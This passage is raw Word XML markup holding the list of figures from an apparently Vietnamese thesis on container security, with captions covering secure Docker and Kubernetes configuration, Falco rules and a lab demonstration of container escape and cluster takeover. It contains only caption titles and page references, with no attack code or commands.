          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A219B8E" w14:textId="725FAD1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3" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.9.  Không gian tên net trên thực tế khi chạy Docker con</w:t>
        </w:r>
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>tainer</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001523 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26597E97" w14:textId="47DBA14A"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4" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2.1. Luồng tấn công vào cont</w:t>
        </w:r>
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ainer image và chuỗi cung ứng</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001524 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="525A1ED3" w14:textId="30D1C37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5" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.1</w:t>
        </w:r>
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>. Cấu hình an toàn cho Dockerfile</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001525 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="665D78CA" w14:textId="582AD8D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6" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.2. Cấu hình pod an toàn áp dụng cấu hình PSA</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001526 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AEFCC0E" w14:textId="13840DD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7" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.3. Cấu hình rule phát hiện sử dụng cho giải pháp Falco</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001527 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C73F36D" w14:textId="52295B4B"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8" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.4</w:t>
        </w:r>
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>. Cấu hình Network Policy đảm bảo kiến trúc Zero-Trust Network</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001528 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="174E7B3C" w14:textId="78EA08B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29" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.1</w:t>
        </w:r>
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>. Mô hình thực nghiệm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001529 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38DA7015" w14:textId="50ADC0DA"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0" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.2. Sơ đồ luồng thực nghiệm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001530 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F0AB3D1" w14:textId="1BAC5A0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1" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.3. Cấu hình dẫn đến khai thác lỗi Misconfiguration</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001531 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48A118C4" w14:textId="77FD4FD0"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2" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.4. Đoạn mã chứa lỗi cho phép hacker khai thác trước khi tấn công escape trong container</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001532 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="673FE7C0" w14:textId="34466616"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3" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.5. Hacker mở cổng 4444 lắng nghe kết nối khi khai thác</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001533 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19AA94B5" w14:textId="6FF793C5"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4" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.6. Hacker chạy lệnh kiểm tra các đặc quyền</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001534 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4017A312" w14:textId="251F0BF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5" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.7. Kết quả việc hacker trích xuất file nhạy cảm trên máy host</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001535 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65D7AFAC" w14:textId="0336ECB9"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6" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.8. Hình ảnh chứng minh việc hacker đã thực sự escape ra ngoài máy host</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001536 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E7B33ED" w14:textId="202DE84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7" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.9. Cấu hình không đảm bảo an toàn của pod Web</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001537 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7783C7C9" w14:textId="0FB0D88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8" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.10. Token bị hacker lấy được trong quá trình khai thác</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001538 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15946F2C" w14:textId="0A20885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39" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.11. Hình ảnh chứng minh hacker đã thực sự chiếm được quyền quản trị cluster</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001539 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A7995EA" w14:textId="13CC2B8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0" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.12. Thao tác thực hiện thanh toán của người dùng bình thường</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001540 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25793549" w14:textId="167A5DEE"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1" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.13. Traffic từ pod p</w:t>
        </w:r>
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ayment được hacker dump được truyền ra ngoài</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001541 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35FDEDFD" w14:textId="0C04379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2" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.14. Kết quá quá trình khai thác là thông tin thẻ tín dụng của người dùng</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001542 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="699FCCCA" w14:textId="27C74F5C"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3" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.15</w:t>
        </w:r>
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>. Mô hình giải pháp bảo vệ hệ thống container đề xuất</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
